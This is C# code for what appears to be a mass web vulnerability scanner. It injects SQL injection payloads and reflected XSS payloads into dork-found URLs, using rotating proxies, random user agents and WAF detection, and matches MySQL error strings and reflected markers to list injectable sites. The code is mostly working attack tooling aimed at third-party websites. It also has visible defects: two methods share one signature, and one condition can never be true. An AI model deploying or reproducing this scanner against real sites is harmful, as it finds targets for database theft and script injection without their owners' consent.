public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null)
{
transActions++;
try
{
List <string> sqlpayloads = new List <string>()
{
"'",
".(('\".,,,,",
"AND 7786=7473-- FNiT",
"\"(().()('.",
"'YgxvMp<'\">AqklPj",
"') AND 7648=7021 AND ('vhCh'='vhCh",
" AND (SELECT 5232 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(5232=5232,1))),0x7176717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FeKK",
" AND 2229 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2229=2229) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(113)))"
};
string userAgent = Leaf.xNet.Http.RandomUserAgent();
bool waf = false;
if (wafProtection(dork))
{
waf = true;
}
Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest()
{
IgnoreProtocolErrors = true,
AllowAutoRedirect = false,
Cookies = new CookieStorage(false),
ConnectTimeout = helperObejct.timeOut * 1000,
ReadWriteTimeout = helperObejct.timeOut * 1000,
KeepAlive = false,
UserAgent = userAgent
};
string baseSource = "";
foreach (string item in sqlpayloads)
{
if (NeedProxy)
{
helperObejct.setProxy(ref req, proxy);
}
List <string> urls = helperObejct.insertPayload(dork, item);
foreach (string urlChecking in urls)
{
if (urlChecking == "itsnotInjectAble")
{
transActions--;
return(bruteResult.unvulnerAble);
}
else
{
if (baseSource.Length <= 0)
{
baseSource = req.Get(dork).ToString();
}
req.Get(urlChecking);
string source = req.Response.ToString().ToLower();
List <string> targetBugs = new List <string>()
{
"warning: mysql_connect()",
"warning: mysql_fetch_row()",
"error in your sql syntax",
"warning: mysql_result()",
"mysql_num_rows()",
"mysql_fetch_assoc()",
"mysql_fetch_row()",
"mysql_numrows()",
"mysql_fetch_object()",
"MySQL Driver",
"MySQL ODBC",
"MySQL Error",
"error in your SQL syntax"
};
foreach (string ite in targetBugs)
{
if (source.Contains(ite.ToLower()) && baseSource.Contains(ite) == false)
{
transActions--;
try
{
string url = dork;
helperObejct.mainFormObject.Dispatcher.Invoke(() =>
{
itsABug bug = new itsABug()
{
id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
url = url,
vulnerability = "sql",
WAF = waf.ToString(),
payload = item
};
helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
helperObejct.mainFormObject.resultView.Items.Refresh();
});
dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
}
catch
{
}
return(bruteResult.sql);
}
}
}
}
}
transActions--;
return(bruteResult.unvulnerAble);
}
catch
{
transActions--;
return(bruteResult.unvulnerAble);
}
}
public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null)
{
transActions++;
try
{
bool waf = false;
if (wafProtection(dork))
{
waf = true;
}
string first = randomText(3);
string sec = randomText(3);
string finalpayloadTest = "'" + first + "<'\">" + sec + "";
string finalpayloadCheck = "" + first + "<'\">" + sec + "";
string finalpayloadCheck2 = $@"{first}<\'\"">{sec}";
List <string> xsspayloads = new List <string>()
{
finalpayloadTest,
"%27%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
"%22%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
"PH09NIXPY74X%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
};
List <string> containsList = new List <string>()
{
finalpayloadCheck2, finalpayloadCheck
};
string userAgent = Leaf.xNet.Http.RandomUserAgent();
string sourceBase = "";
foreach (string item in xsspayloads)
{
List <string> urls = helperObejct.insertPayload(dork, item);
foreach (string urlNew in urls)
{
if (urlNew == "itsnotInjectAble")
{
transActions--;
return(bruteResult.unvulnerAble);
}
else
{
Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest()
{
IgnoreProtocolErrors = true,
AllowAutoRedirect = true,
Cookies = new CookieStorage(false),
ConnectTimeout = helperObejct.timeOut * 1000,
ReadWriteTimeout = helperObejct.timeOut * 1000,
KeepAlive = false,
UserAgent = userAgent
};
if (sourceBase.Length <= 0)
{
sourceBase = req.Get(dork).ToString();
}
string source = req.Get(urlNew).ToString();
Regex rx = new Regex("PH09NIXPY74X<svg|" + finalpayloadCheck + "|" + finalpayloadCheck2);
if (rx.IsMatch(source) && rx.IsMatch(sourceBase) == false)
{
transActions--;
try
{
string url = dork;
helperObejct.mainFormObject.Dispatcher.Invoke(() =>
{
itsABug bug = new itsABug()
{
id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
url = url,
vulnerability = "xss",
WAF = waf.ToString(),
payload = item
};
helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
helperObejct.mainFormObject.resultView.Items.Refresh();
});
dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
}
catch
{
}
return(bruteResult.xss);
}
else
{
foreach (var STR in containsList)
{
if (source.Contains(STR) && source.Contains(STR) == false)
{
transActions--;
try
{
string url = dork;
helperObejct.mainFormObject.Dispatcher.Invoke(() =>
{
itsABug bug = new itsABug()
{
id = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
url = url,
vulnerability = "xss",
WAF = waf.ToString(),
payload = item
};
helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
helperObejct.mainFormObject.resultView.Items.Refresh();
});
dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
}
catch
{
}
return(bruteResult.xss);
}
}
}
}
}
}
transActions--;
return(bruteResult.unvulnerAble);
}
catch
{
transActions--;
return(bruteResult.unvulnerAble);
}
}
